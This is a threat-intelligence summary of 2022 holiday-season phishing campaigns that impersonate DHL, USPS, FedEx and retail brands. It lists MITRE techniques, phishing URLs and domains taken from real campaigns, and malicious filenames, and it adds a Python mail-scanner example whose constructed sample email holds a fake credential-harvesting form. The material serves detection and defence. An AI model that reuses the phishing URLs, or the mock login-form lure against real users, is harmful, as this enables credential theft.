During the 2022 holiday shopping season, cybercriminals have intensified seasonal phishing and fraud campaigns that blend with legitimate shopping activity. Trustwave SpiderLabs outlines package-delivery, fake-order, and promotional scams impersonating brands like DHL, USPS, FedEx, Ray-Ban, Louis Vuitton, and Geek Squad, often delivering credential-stealing pages or malware. #DHL #USPS #UPS #FedEx #RayBan #LouisVuitton #GeekSquad #WarzoneRAT
Keypoints
- Holiday shopping season correlates with an uptick in fraud schemes designed to blend with normal shopping activity.
- Package delivery scams impersonate couriers (DHL, USPS, UPS, FedEx) and use fake tracking links or attachments to steal data or deliver malware.
- DHL Express address-confirmation phishing uses an HTML attachment that hosts a fake login page to harvest credentials.
- The Warzone Remote Access Trojan (RAT) can be dropped as a payload via phishing and is capable of credential theft and UAC bypass.
- Fake promotions and order scams impersonate brands (Ray-Ban, Louis Vuitton, 7-Eleven, Geek Squad) to lure victims into providing personal or payment details.
- Practical protections include MFA, up-to-date software, cautious shopping practices, and safe habits for tracking parcels and shopping online.
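The delivery-scam mechanics above (an HTML attachment that hosts a fake courier login page, or an executable/disk-image "Delivery Report" attachment) can be turned into a simple mail-gateway check. The following is an added example, not code from Trustwave's report; the message it scans is constructed for illustration, and the hostnames in it are placeholders.

```python
import email
import re
from email import policy

# Constructed sample modelled on the DHL "AWB_*.html" lure and the
# "Delivery Report.img" payload named above; hostnames are placeholders.
SAMPLE_EML = """From: "DHL Express" <notify@example.invalid>
To: victim@example.invalid
Subject: Address confirmation required for shipment AWB 87990589
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please confirm your delivery address using the attached form.
--b1
Content-Type: text/html; name="AWB_87990589.html"
Content-Disposition: attachment; filename="AWB_87990589.html"

<html><body><form action="https://phish.example.invalid/DHL.php" method="post">
Email <input name="e"> Password <input type="password" name="p"></form></body></html>
--b1
Content-Type: application/octet-stream; name="Delivery Report.img"
Content-Disposition: attachment; filename="Delivery Report.img"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""

RISKY_EXT = re.compile(r"\.(exe|img|iso|scr|js|vbs)$", re.IGNORECASE)
PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.IGNORECASE)
DELIVERY_WORDS = re.compile(r"\b(delivery|shipment|tracking|awb|parcel|package)\b", re.IGNORECASE)

def scan_message(raw: str) -> list[str]:
    """Return human-readable findings for one RFC 822 message (empty if clean)."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    themed = bool(DELIVERY_WORDS.search(msg.get("Subject", "")))
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            body = part.get_content()
            if isinstance(body, bytes):
                body = body.decode("utf-8", "replace")
            if PASSWORD_FIELD.search(body):  # attachment carries its own login form
                findings.append(f"HTML attachment '{name}' contains a password form (credential-harvesting page)")
        if RISKY_EXT.search(name):
            tag = " with delivery-themed name" if DELIVERY_WORDS.search(name) else ""
            findings.append(f"executable/disk-image attachment '{name}'{tag}")
    if themed and findings:
        findings.append("delivery-themed subject combined with risky attachment: treat as likely phishing")
    return findings
```

Running `scan_message(SAMPLE_EML)` flags both attachments plus the subject/attachment combination; a plain-text message with no attachments returns an empty list.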
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Link – “These messages threat actors craft as package delivery notifications … contain a fake tracking link or an attachment that directs to a fake website asking users to input their password or other sensitive information.”
- [T1566.002] Phishing – Spearphishing Attachment – “The attachment is an HTML file named “AWB_87990589.html.” When clicked, it does not show any shipping information … Instead, it shows a fake DHL Express login page that asks for the user’s account password.”
- [T1548.001] Bypass User Account Control – “Once executed, [it drops] the Warzone Remote Access Trojan (RAT) as its payload, which is capable of credential theft and User Access Control (UAC) bypass.”
- [T1003] Credential Access – “the Warzone RAT … capable of credential theft.”
Indicators of Compromise
- [URL/Domain] – Examples of phishing domains/URLs used in campaigns: barbacoasevilla.com/mail/DHL.php, gai-building.azurewebsites.net/bolderi.php?i=chanted&e=minimum, security-subscriber-center.grau-r.com/SubscribeClick?ox=rbm&[email protected], www.rbmhouse.com/m
- [Domain] – Additional phishing domains referenced: rbmhouse.com, grau-r.com, barbacoasevilla.com
- [File] – Attachments and payloads used in campaigns: Delivery Report.exe, Delivery Report.img